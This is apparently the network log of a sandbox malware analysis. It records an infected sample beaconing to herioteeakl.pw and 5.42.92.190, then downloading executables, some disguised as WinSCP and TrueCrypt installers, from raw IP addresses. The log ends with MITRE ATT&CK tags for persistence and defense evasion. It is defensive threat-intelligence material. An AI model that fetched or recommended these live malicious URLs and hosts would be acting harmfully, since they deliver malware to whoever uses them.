6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

18.9kB
1.7kB
19
13

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.1kB
1.4kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

1.6kB
1.3kB
6
5

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

2.0kB
1.4kB
7
6

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
104.21.42.121:80

http://herioteeakl.pw/api

http

AppLaunch.exe

363.2kB
6.2kB
265
127

HTTP Request

POST http://herioteeakl.pw/api

HTTP Response

200
5.42.92.51:19057

AppLaunch.exe

156 B
3
5.42.92.190:80

http://5.42.92.190/fks/index.php

http

6.0kB
103.6kB
55
91

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404
5.42.65.80:80

http://5.42.65.80/newrock.exe

http

252.7kB
7.5MB
3983
5617

HTTP Request

GET http://5.42.65.80/newrock.exe

HTTP Response

200
194.49.94.72:80

http://194.49.94.72/1.exe

http

288.3kB
16.5MB
6142
11815

HTTP Request

GET http://194.49.94.72/1.exe

HTTP Response

200
194.49.94.11:80

http://194.49.94.11/

http

5271.exe

6.7MB
37.0kB
4815
727

HTTP Request

POST http://194.49.94.11/

HTTP Response

200

HTTP Request

POST http://194.49.94.11/

HTTP Response

200

HTTP Request

POST http://194.49.94.11/

HTTP Response

200

HTTP Request

POST http://194.49.94.11/

HTTP Response

200
104.26.12.31:443

https://api.ip.sb/geoip

tls, http

5271.exe

707 B
4.2kB
8
7

HTTP Request

GET https://api.ip.sb/geoip

HTTP Response

200
5.42.92.51:19057

AppLaunch.exe

156 B
3
5.42.92.190:80

http://5.42.92.190/fks/index.php

http

97.1kB
4.5MB
1865
3254

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404
194.169.175.235:42691

B247.exe

2.5MB
36.3kB
1862
719
194.169.175.118:80

http://194.169.175.118/traffico.exe

http

7.6kB
420.9kB
161
312

HTTP Request

GET http://194.169.175.118/traffico.exe

HTTP Response

200
179.61.246.174:80

http://179.61.246.174/WinSCP-6.1.2-Setup.exe

http

8.5kB
485.3kB
181
350

HTTP Request

GET http://179.61.246.174/WinSCP-6.1.2-Setup.exe

HTTP Response

200
194.49.94.120:80

http://194.49.94.120/TrueCrypt_KSfcnd.exe

http

331.2kB
18.9MB
7082
13574

HTTP Request

GET http://194.49.94.120/TrueCrypt_KSfcnd.exe

HTTP Response

200
194.49.94.80:42359

C796.exe

2.5MB
15.9kB
1843
213
194.169.175.235:42691

jsc.exe

2.5MB
32.7kB
1856
655
5.42.92.51:19057

AppLaunch.exe

156 B
3
31.192.237.23:80

RegSvcs.exe

156 B
3
95.214.26.28:80

http://host-host-file8.com/

http

782 B
362 B
6
4

HTTP Request

POST http://host-host-file8.com/

HTTP Response

200
5.42.92.190:80

http://5.42.92.190/fks/index.php

http

710 B
876 B
7
6

HTTP Request

POST http://5.42.92.190/fks/index.php

HTTP Response

404
193.233.132.12:80

156 B
3
5.42.92.51:19057

156 B
3
195.10.205.16:1056

2.5MB
36.7kB
1866
756
162.159.130.233:443

cdn.discordapp.com

tls

190.3kB
7.0MB
3413
5040
185.82.216.108:443

server7.theupdatetime.org

tls

1.4kB
6.6kB
14
17
188.114.96.0:443

walkinglate.com

tls

65.4kB
2.2MB
1132
1595
199.249.230.108:443

www.cztrw2ns3bx7.com

tls

58.1kB
844.4kB
576
625
199.249.230.148:443

www.fwhv554v2kzbpjacdjdzzorva.com

tls

3.4kB
20.8kB
15
20
51.222.9.95:9001

www.vxtykmn.com

tls

854.2kB
9.5MB
6074
7032
45.136.31.178:9001

www.nnw3orug.com

tls

359.1kB
4.0MB
2340
2914
185.82.216.108:443

server7.theupdatetime.org

tls

1.3kB
6.2kB
12
15
5.42.92.51:19057

156 B
3
51.222.9.95:9001

www.nwask2dio7mk.com

tls

6.7kB
9.2kB
18
24
213.21.220.222:8080

1.2MB
22.8kB
845
389
45.136.31.178:9001

www.qijf6eyylhm.com

tls

5.0kB
7.1kB
14
13

8.8.8.8:53

218.240.110.104.in-addr.arpa

dns

74 B
141 B
1
1

DNS Request

218.240.110.104.in-addr.arpa
8.8.8.8:53

herioteeakl.pw

dns

AppLaunch.exe

60 B
92 B
1
1

DNS Request

herioteeakl.pw

DNS Response

104.21.42.121

172.67.161.219
8.8.8.8:53

121.42.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

121.42.21.104.in-addr.arpa
8.8.8.8:53

190.92.42.5.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

190.92.42.5.in-addr.arpa
8.8.8.8:53

80.65.42.5.in-addr.arpa

dns

69 B
129 B
1
1

DNS Request

80.65.42.5.in-addr.arpa
8.8.8.8:53

72.94.49.194.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

72.94.49.194.in-addr.arpa
8.8.8.8:53

11.94.49.194.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

11.94.49.194.in-addr.arpa
8.8.8.8:53

api.ip.sb

dns

5271.exe

55 B
145 B
1
1

DNS Request

api.ip.sb

DNS Response

104.26.12.31

104.26.13.31

172.67.75.172
8.8.8.8:53

31.12.26.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

31.12.26.104.in-addr.arpa
8.8.8.8:53

235.175.169.194.in-addr.arpa

dns

74 B
135 B
1
1

DNS Request

235.175.169.194.in-addr.arpa
8.8.8.8:53

118.175.169.194.in-addr.arpa

dns

74 B
135 B
1
1

DNS Request

118.175.169.194.in-addr.arpa
8.8.8.8:53

174.246.61.179.in-addr.arpa

dns

73 B
132 B
1
1

DNS Request

174.246.61.179.in-addr.arpa
8.8.8.8:53

120.94.49.194.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

120.94.49.194.in-addr.arpa
8.8.8.8:53

80.94.49.194.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

80.94.49.194.in-addr.arpa
8.8.8.8:53

host-file-host6.com

dns

65 B
138 B
1
1

DNS Request

host-file-host6.com
8.8.8.8:53

host-host-file8.com

dns

65 B
81 B
1
1

DNS Request

host-host-file8.com

DNS Response

95.214.26.28
8.8.8.8:53

28.26.214.95.in-addr.arpa

dns

71 B
132 B
1
1

DNS Request

28.26.214.95.in-addr.arpa
8.8.8.8:53

4512c097-ea09-4b74-b6a1-3c92fa658275.uuid.theupdatetime.org

dns

105 B
166 B
1
1

DNS Request

4512c097-ea09-4b74-b6a1-3c92fa658275.uuid.theupdatetime.org
8.8.8.8:53

16.205.10.195.in-addr.arpa

dns

72 B
132 B
1
1

DNS Request

16.205.10.195.in-addr.arpa
8.8.8.8:53

1.173.189.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

1.173.189.20.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

stun2.l.google.com

dns

64 B
80 B
1
1

DNS Request

stun2.l.google.com

DNS Response

142.251.125.127
8.8.8.8:53

cdn.discordapp.com

dns

64 B
144 B
1
1

DNS Request

cdn.discordapp.com

DNS Response

162.159.130.233

162.159.134.233

162.159.133.233

162.159.129.233

162.159.135.233
8.8.8.8:53

server7.theupdatetime.org

dns

71 B
87 B
1
1

DNS Request

server7.theupdatetime.org

DNS Response

185.82.216.108
142.251.125.127:19302

stun2.l.google.com

48 B
60 B
1
1
8.8.8.8:53

127.125.251.142.in-addr.arpa

dns

74 B
108 B
1
1

DNS Request

127.125.251.142.in-addr.arpa
8.8.8.8:53

233.130.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

233.130.159.162.in-addr.arpa
8.8.8.8:53

walkinglate.com

dns

61 B
93 B
1
1

DNS Request

walkinglate.com

DNS Response

188.114.96.0

188.114.97.0
8.8.8.8:53

108.216.82.185.in-addr.arpa

dns

73 B
136 B
1
1

DNS Request

108.216.82.185.in-addr.arpa
8.8.8.8:53

0.96.114.188.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

0.96.114.188.in-addr.arpa
8.8.8.8:53

108.230.249.199.in-addr.arpa

dns

74 B
105 B
1
1

DNS Request

108.230.249.199.in-addr.arpa
8.8.8.8:53

148.230.249.199.in-addr.arpa

dns

74 B
105 B
1
1

DNS Request

148.230.249.199.in-addr.arpa
8.8.8.8:53

178.31.136.45.in-addr.arpa

dns

72 B
104 B
1
1

DNS Request

178.31.136.45.in-addr.arpa
8.8.8.8:53

95.9.222.51.in-addr.arpa

dns

70 B
107 B
1
1

DNS Request

95.9.222.51.in-addr.arpa
8.8.8.8:53

222.220.21.213.in-addr.arpa

dns

73 B
125 B
1
1

DNS Request

222.220.21.213.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry